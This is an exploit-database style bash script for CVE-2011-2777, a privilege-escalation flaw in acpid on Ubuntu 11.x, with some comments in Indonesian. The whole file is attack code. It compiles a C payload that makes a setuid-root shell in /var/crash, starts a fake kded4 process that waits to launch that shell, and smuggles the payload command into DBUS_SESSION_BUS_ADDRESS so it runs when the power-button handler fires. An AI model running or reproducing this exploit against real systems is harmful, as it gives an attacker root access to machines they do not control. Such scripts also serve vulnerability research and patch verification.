##################################################################
# Exploit Title: Acpid Privilege Boundary Crossing Vulnerability #
# Google Dork: #
# Date: 23-11-2011 #
# Author: otr #
# Software Link: https://launchpad.net/ubuntu/+source/acpid #
# Version: 1:2.0.10-1ubuntu2 #
# Tested on: Ubuntu 11.10, Ubuntu 11.04 #
# CVE : CVE-2011-2777 #
##################################################################
#!/bin/bash
PAYLOADEXE="/var/crash/payload"
PAYLOADC="/var/crash/payload.c"
KDEDC="kded4.c"
KDEDEXE="kded4"
TRIGGER="/etc/acpi/powerbtn.sh"
rm -f $PAYLOADEXE $KDEDEXE $KDEDC $PAYLOADC
echo "[+] Setting umask ke 0 untuk writable files."
umask 0
echo "[+] Preparing binary payload."
# mencoba untuk mendapatkan suid root shell, jika tidak kita hanya akan mendapatkan
# shell dari user lain
cat > $PAYLOADC <<_EOF
#include <sys/stat.h>
void main(int argc, char **argv)
{
if(!strstr(argv[0],"shell")){
printf("[+] Preparing suid shell.\\n");
system("cp /var/crash/payload /var/crash/shell");
setuid(0);
setgid(0);
chown ("/var/crash/shell", 0, 0);
chmod("/var/crash/shell", S_IRWXU | S_IRWXG | S_IRWXO | S_ISUID | S_ISGID);
}else{
execl("/bin/sh", "/bin/sh", "-i", 0);
}
}
_EOF
gcc -w -o $PAYLOADEXE $PAYLOADC
echo "[+] Preparing fake kded4 process."
cat > $KDEDC <<_EOF
#include <unistd.h>
void main (){
while(42){
sleep(1);
if( access( "/var/crash/shell" , F_OK ) != -1 ) {
execl("/var/crash/shell", "/var/crash/shell", "-i", 0);
exit(0);
}
}
}
_EOF
gcc -w -o $KDEDEXE $KDEDC
rm -f $KDEDC $PAYLOADC
echo "[+] Exporting DBUS_SESSION_BUS_ADDRESS."
export DBUS_SESSION_BUS_ADDRESS="xxx & $PAYLOADEXE"
echo "[+] Starting kded4."
echo "[+] Trying to PMS the system."
echo "[+] Menunggu Tombol power di tekan ."
echo "[+] anda akan mendapatkan shell pada console ini."
./$KDEDEXE
rm $KDEDEXE